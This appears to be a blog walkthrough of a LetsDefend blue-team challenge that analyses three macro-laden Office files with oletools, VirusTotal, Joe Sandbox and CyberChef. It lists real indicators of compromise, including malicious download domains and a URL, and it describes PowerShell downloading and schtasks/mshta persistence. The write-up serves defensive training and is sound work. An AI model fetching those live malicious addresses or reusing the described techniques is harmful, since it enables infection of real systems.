Malicious Document Analysis -

Malicious document files are really popular nowadays. Typically, attackers use these files to infiltrate and compromise endpoints and networks. Threat actors have taken advantage of documents by using macros to conduct malicious practices. In this post, we will discuss and analyze malicious documents and uncover hidden indicators of compromise (IOCs).

Table of Content

What’s a Macros?
Types of Analysis
Challenge
Summary
How To Protect Against Macro Malware
Conclusion

What’s a Macros?

First let’s understand the term macros

A macro is a series of commands used to automate a repeated task and can be run when you have to perform the task. Macros are typically written in VBA (Visual Basic for Applications), a programming language developed by Microsoft that is supported by all Microsoft office products, e.g, Word, Excel, etc. Users can apply a signed certificate on the macros they create to confirm where the macro originated from; they can also be verified by organizations to offer users trustworthy macros to use as needed.

Users, administrators and service providers can write macros, but so can threat actors. Some macros can pose a security risk by introducing viruses and other malicious software to your computer.

Malicious Macros

Macro malware hides in Microsoft Office files and there are a number of methods threat actors can implement to deliver these files to users, but via email is most prevalent. We all know about phishing and how simple but yet effective these attacks are. One common way phishing attacks are successful is by attaching malicious documents to emails. These malicious documents could contain malware designed to exfiltrate information from the victim or download a ransomware that encrypts the victim’s file system. These files use names that are intended to entice or scare people into opening them. They often look like invoices, receipts, legal documents, and more.

Invoice Document urging the user to enable the contained macros (**National Cyber Security Centre**)

According to the Canadian Centre for Cyber Security, threat actors can use malicious macros to bypass security controls, like allow lists, and gain access to your systems and network. These macros can be used to execute malicious content and steal or destroy sensitive information. Phishing attempts often use malicious macros in the attached files of their messages, disguised as legitimate attachments. A threat actor may be able to convince you to activate macros in an attachment, allowing the malicious content to spread throughout your systems and network.

Macro malware was fairly common and quite effective several years ago because macros could run automatically whenever a document was opened. However, in recent versions of Microsoft Office, macros are disabled by default. Now, malware authors need to convince users to turn on macros so that their malware can run. They try to scare or urge users by showing fake warnings when a malicious document is opened.

Types of Analysis

Malware analysis is the study of the unique features and behaviours, objectives, sources, and potential effects of harmful software such as spyware, viruses and ransomware, etc.

Security professionals typically perform analysis on malicious files and software to detect and understand their behaviours, characteristics, and capabilities. This allows professionals to fully grasp the potential threats that these programs pose and thereby develop defensive mechanisms and countermeasures to help them avoid/mitigate these threats.

With malware analysis, you can extract indicators of compromise (IOCs) to better understand how malware can attack your system. An IOC is data indicating that a system breach or attack has occurred. You can use this data to understand how your system reacts to attacks, making it easier to detect attacks in the future.

There are commonly two types of malware analysis techniques — static and dynamic.

Static Analysis

In static malware analysis, security experts analyze a malware program without executing its code. The aim is to identify malware families, how a malware operates, and its capabilities. Static malware analysis can uncover clues regarding the nature of a malware, such as filenames, hashes, IP addresses, domains, and file header data. Since there’s no code execution, static malware analysis doesn’t require a live environment

Static analysis is straightforward because experts only have to evaluate the malware sample properties, such as metadata, strings, structure, and code. Static malware analysis uses a signature-based detection approach, which compares the sample code’s digital footprint against a database of known malicious signatures. Analysts perform static malware analysis by extracting a sample’s string metadata to reveal details like commands, filenames, messages, API calls, registry keys, URLs, and other IOCs.

Alternatively

Dynamic Analysis

Dynamic malware analysis involves executing a malware’s code within a controlled environment and monitoring how it interacts with a system. Such analysis allows analysts to discover the malware’s true intentions and ability to evade detection. This approach provides a more in-depth, accurate report, but the process can take longer. To safely run the malware and observe its activities, security analysts need a closed and isolated testing environment (malware sandbox) where the malware can execute without infecting the entire system or network.

While static analysis uses signature-based detection, dynamic analysis uses a behaviour-based detection approach. Quickly evolving malware or new types of malware can be hard to detect using the signature-based approach. Some forms of malware can also obscure their signature, making static analysis ineffective. Since dynamic analysis uses the behaviour-based detection approach, it ensures it is possible for security analysts to identify and understand new and unknown threats. Malware often contacts remote servers to receive commands to create or modify files, open other network connections, make changes to the registry or exfiltrate data; dynamic analysis includes monitoring and analyzing the malware’s traffic during execution to understand the servers it communicates with, the types of commands it receives, and the data it may potentially exfiltrate.

By combining both static and dynamic techniques, security teams can better understand malware threats and develop more effective defense strategies to detect and mitigate potential attacks.

Challenge

For this task, we will make use of the SOC/Blue Team training platform Let’s Defend and its materials. We will analyze three potentially malicious files. You can follow along by heading to the following challenges on the platform

We have a few documents that could potentially contain macros. Our job as analysts will be to confirm if these files are indeed malicious, identify indicators of compromise, and to answer some questions that can assist with incident response.

For our investigation, we will implement both static and dynamic methods to analyze the potentially malicious docs. We will gather information by adopting static analysis to examine the documents’ contents and structures, understanding the nature of the potential threats, and dynamic analysis to observe and understand their behaviours. For the first part of the challenge, we will use mostly static analysis and bring in dynamic analysis for the second part.

We will be using an Ubuntu VM for this task and the following tools:

Exiftool
Oletools
Virustotal
Joe Security Sandbox
CyberChef

Let’s begin

Q. What is the MD5 value of the “/root/Desktop/QuestionFiles/PO-465514-180820.doc” file?

This is asking us for the hash of the PO-465514-180820.doc file, particularly the md5 value. We can get the value by using the md5sum command.

md5sum PO-465514-180820.doc

We got the hash

Every malware has a unique digital fingerprint that uniquely identifies it. This could be a cryptographic hash, a binary pattern, or a data string. We can use the hash value to determine if the file is malicious by passing it through VirusTotal, an online service that analyzes suspicious files and URLs to detect types of malware and malicious content using antivirus engines and website scanners. We will upload the hash of the file to VirusTotal.

Majority of the antivirus engines found the file to be malicious. It appears to be a Trojan malware, a type of malware that attempts to appear harmless and legitimate. Once installed, trojans perform various malicious activities such as stealing personal information, downloading other malware, or giving attackers access to your device.

Ans: d7e6921bfd008f707ba52dee374ff3db

Q. What is the file type of the “/home/analyst/PO-465514-180820.doc” file?

Our next question is asking for the file type for the document. So, we are asked to get retrieve more information about the file; I’ll be using the tool called exiftool to retrieve the required information. Exiftool is a free and open-source software program for reading, writing and updating metadata for a variety of file types. We will use the command

exiftool PO-465514-180820.doc

From the result, we can see a bunch of information about the file, e.g., Author of the file, file size, creation and modification dates, file permissions and file type etc.

Ans: DOC

Q: Does the file “/root/Desktop/QuestionFiles/PO-465514-180820.doc” contain a VBA macro?

There are a number of ways to determine if a file contains VBA macros. We will make use of Oletools to answer this and the next couple of question.

Oletools is a package of python tools used for analysis of Microsoft OLE2 files which include mainly MS Office documents and Outlook messages. It is used for malware analysis and digital forensics. With oletools, you can analyze these malicious documents and “fish out” the threat actors.

To install the oletools

sudo -H pip install -U oletools

We will use oleid for this question. The tool oleid oleid is a script to analyze OLE files such as MS Office documents (e.g. Word, Excel), to detect specific characteristics usually found in malicious files (e.g. malware). It can detect the OLE file type of the document from its internal structure, if the document is encrypted and it can also detect VBA macros in a file.

Use the command

oleid PO-465514-180820.doc

The OLE tool oleid gives the file format and application name. More importantly, it shows us that the file contains VBA macros. It shows no external relationships, no hidden file within the document

Ans: Yes

Q. Some malicious activity occurs when the document file “/root/Desktop/QuestionFiles/PO-465514-180820.doc” is opened. What is the macro keyword that enables this?

Files can contain VBA macros commands that are written to run or execute a certain action as soon as the user opens up the document. To identify the keyword, we’d have to take a look at the macros. To do this, we will use olevba. The tool olevba is used to extract and analyze VBA Macro source code from MS Office documents (VBA Source code is embedded code in MS Office documents which can be executed on opening the document). We will use the command below to analyze and discover suspicious keywords and indicators.

olevba PO-465514-180820.doc

The result gives us the indicators within the VBA macro script and highlights suspicious keywords. We can see the keyword Document_open is an autoexec type of command that runs/loads programs anytime the document starts up and is active.

If we look at the script, we see a lot of obfuscated characters. The authors of this file obfuscated the script to make it unclear and difficult to understand. Cybercriminals can employ the obfuscation strategy to hide the true intent and functionality of their malicious code by making it hard to understand for both security analysts and security tools. This technique makes malware more difficult to detect, analyze and eliminate; compression, encryption, and encoding are some of the most common obfuscation methods used by threat actors.

To understand the script a little more, we can use oletools to try and de-obfuscate the script. We will first save the olevba output of the document. Save the document as PO-465514-180820.vba

To de-obfuscate the file, we will use the command

olevba --deobf --reveal PO-465514-180820.vba > PO-465514-180820_deobf.vba

We can open the document with visual studio preferably or any text editor

Our result does look a little different from the previous olevba output. We can see more suspicious keywords that exhibit strong malicious intent, e.g., command, create etc.

Ans: Document_open

Q. Who is the author of the file “/root/Desktop/QuestionFiles/PO-465514-180820.doc”?

We saw this information when we answered a previous question

Ans: alexandre riviere

Q. What is the last saved time of the “/root/Desktop/QuestionFiles/PO-465514-180820.doc” file?

To retrieve this information we will use olemeta. This tool is part of the python-oletools package, it can used to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract all standard properties present in the OLE file.

Here’s the command

olemeta PO-465514-180820.doc

Ans: 2020-08-18 08:19:00

Now we have been able to gather the requested information for the particular file PO-465514-180820.doc. Let’s check out and analyze another file. We have been assigned to conduct analysis on the Siparis_17.xls file as well.

Let’s confirm if this suspicious file is malicious. We will first check the file for VBA macros and hash the file to verify in VirusTotal. We use the oleid command

oleid Siparis_17.xls

The file does indeed contain VBA macros, a strong indication that it is malicious. Let us confirm this by using VirusTotal.

We will get the SHA256 hash value of the file

Yeah, it’s definitely malicious! It looks like another Trojan malware that runs via PowerShell

Q. The malicious file “Siparis_17.xls” is trying to download files from an address. From which domain is it trying to download the file?

Let’s analyze the content of the file and see what we can discover. We will use olevba to review the macros.

olevba Siparis_17.xls

Yep, we see there are keywords that are PowerShell commands; it does make use of PowerShell! We can also see a couple IOCs (Indicators of Compromise). We see a URL to a foreign and unsecure site, and a suspicious looking file.

Ans: hocoso.mobi

Q. How many IOCs are in the “Siparis_17.xls” file according to the Olevba tool

We already have this information

Ans: 2

Nice! We are done with static part of the analysis, next we will go into the Dynamic section where we will understand the behaviours of the malicious files when active. For this part of the analysis, we will use the sandboxes VirusTotal and Joe Security. We are already familiar with VirusTotal. Joe Sandbox detects and analyzes potential malicious files and URLS on several operating systems for suspicious activities. It performs deep malware analysis and generates comprehensive and detailed analysis reports.

Let’s get started!

Q. The file PO-465514-180820.doc is trying to make a request to a domain ending with “.kz”. What is this domain?

We will go to VirusTotal and head to the Details tab and look at the connections the document made. We can see a domain that ends with the particular top-level domain .kz.

Ans: www.msbc.kz

Q. With which Windows tool are the connection requests made? (file:PO-465514-180820.doc)

This time we use Joe Security sandbox

Run the hash of the malicious file on the online sandbox environment

We will pick the full analysis report and review it. Let’s head to the process tree to follow the processes.

Looking at the process tree, it appears that powershell was executed after opening the malicious doc. Most likely the file will attempt to reach out to the internet via powershell. But to confirm this we will attempt to decode the characters we see in the image and view the content (like mentioned in a previous question; threat actors can obfuscate/encode text to make it harder to read)

We will use CyberChef, a open-source tool that is used extensively by Cyber Security Professionals to carry out both simple and complex data manipulation tasks within a web browser, it is great for encryption, encoding, compression and data analysis. Head to CyberChef

Copy and paste the encoded characters in the input space

Select From Base64

Select Remove null bytes

So we were able to decode and de-obfuscate the string of characters we had to an extent, it may still be difficult to read. But, we can see the www.msbc.kz domain. So the document did attempt to reach out to this domain and others via powershell.

Ans: powershell.exe

Q. How many addresses does the file send DNS requests to? (file:PO-465514-180820.doc)

To answer this question, we will return to the Joe Security report. Let’s head to the Domains and IPs section and look under Contacted Domains

Ans: 5

Q. The “Siparis_17.xls” malware document is trying to download a file. With what name does he want to save the file it is trying to download to the device?

We had already gotten the name of the file when we ran olevba for this document.

Ans: 6LeGwKmrm.jar

We have one more file to analyze. It appears to be a PPT (PowerPoint) file, PO#00187.ppt

We were initially given a zip file, had to unzip the document to retrieve the particular file. As usual, we get the hash value of the file and run it through VirusTotal to verify if it is malicious or not.

Q. What was the general name / category of the malicious file in the analyzed ppt file?

We determined that the file is malicious. Now, we just have to identify the category of the malicious file

So we see that most of the antivirus engines that identified the file as malicious, classified it as a VB Trojan agent

Ans: vb:trojan

Q. Which of the url addresses it communicates with has been detected as harmful by sandboxes?

Here, we are to identify a url address that has bad reputation and is flagged as malicious. We will go to the Details tab in Virus Total and look at the contacted urls and see which ones have been detected .

We see a particular URL that has been flagged the most out of the rest

Ans: http://onedrive.linkpc.net/ali/yasine/idman.lnk

Q. What is the name of the htm file that drops to disk?

We are looking for a file that was dropped to the disk when the malicious PPT file is open and running. Malicious files can act as Droppers, which connect to the internet to drop files on the compromised machine.

Let’s head to the Dropped files section under the Details Tab. Go through the listed dropped files and pick out the one that has a .htm extension

Ans: hdkjashdkasbctdgjsa[1].htm

Q. Which process is running to persistent under mshta.exe after the relevant malware runs?

Persistence in security occurs when a threat actor or malware maintains continued access to a system after the initial point of compromise. Cyber criminals employ techniques and strategies that enable long-term access to systems despite disruptions such as restarts or changed credentials. Persistence gives them the ability to return again and again, no matter how many times you try to kick them out.

Without persistence, a compromise would be limited to the initial breach. An attacker could lose access when the system is rebooted or patched. Persistence ensures hackers have an ongoing presence. Persistence may involve replacing legitimate system files with malware-equipped versions, editing configurations to enable backdoor access, installing automated scripts, or tweaking a cron job to trigger remote commands. Attackers essentially implant remote access to prevent loss of system control after initial infection.

We will run the hash of the file in Joe Security.

Let’s head to the Mitre Att&ck Matrix section, and look under Persistence to see and understand the methods deployed by the malware to attempt to maintain persistence. The MITRE ATT&CK framework is a curated knowledge base and model for cyber adversary behaviour, reflecting the various phases of an adversary’s attack life cycle and the platforms they are known to target. It tracks adversary tactics and techniques used by threat actors across the entire attack life cycle. The framework is used by security professionals as a tool to understand the strategies adopted by threat actors and motivations for individual actions, and how to better go about strengthening an organization’s security posture.

We can see a number of techniques were used to try to maintain access to the system. Let’s take a look at Scheduled Task/Job and see what we can learn.

This image has an empty alt attribute; its file name is Screenshot-1142.png

From the description, we understand that schtasks.exe, a tool that allows administrators to create, delete, query, change, run, and end scheduled tasks on a local or remote computer, was deployed. To confirm this, let’s review the process tree and see what we find

So, we do see that the schtasks.exe is running under mshta.exe, a utility that executes Microsoft HTML Applications (HTA) files, this tool can be abused by threat actors to evade defenses and execute malicious .hta files and Javascripts or VBScripts.

When we view the command, we see that the schtasks tool was used to forcefully create a task named lunkicharkhi, that will run every 80 minutes; this task will use the mshta.exe to execute a malicious VBScript, and likely download and execute a malicious file.

Ans: schtasks.exe

Great, we have come to the end of the analysis!

Summary

We examined the malicious documents to understand their nature and how they work without running them and retrieved IOCs as well. Next, we further analyzed these documents using online sandboxes and examined how they operate at runtime. Based on our analysis of the given documents, these documents should be considered as malicious!

Hybrid analysis, i.e combining both static and dynamic, helps detect unknown threats, even those from the most sophisticated malware. It provides greater insight into how a malware works and enables malware analysts to extract more useful information to use in detecting and remediating an infection by the malware.

Malware and malicious document analysis are important and beneficial in areas such as threat detection, threat hunting, vulnerability analysis and incident response.

How To Protect Against Macro Malware

The following highlight how we can stay safe and defend against macro malware:

Make sure macros are disabled by default in your Microsoft Office applications.
Emails are the common way macro malware infects systems. Don’t open suspicious emails or attachments. Configure mail servers and secure email gateways to include features to block or quarantine Microsoft Office files containing macros.
Use organization-developed or signed macros that are verified by technical authorities.
Promote awareness and train end users on macro security and phishing.
Update and patch applications and systems frequently.
Scan your devices regularly with an anti-malware/anti-virus program from a reputable vendor; to detect suspicious/malicious behaviour on host systems.
Deploy intrusion detection systems (IDS) and endpoint detection and response systems (EDR) to detect and quarantine files with matching malicious hashes.

Conclusion

Macros are a powerful way to automate common tasks in Microsoft Office and can make people more productive. However, VBA macros are a common way for malicious actors to gain access to deploy malware and ransomware on devices. Remember, don’t enable macros in a Microsoft 365 file unless you’re sure you know what those macros do and you want the functionality they provide.

Malicious Document Analysis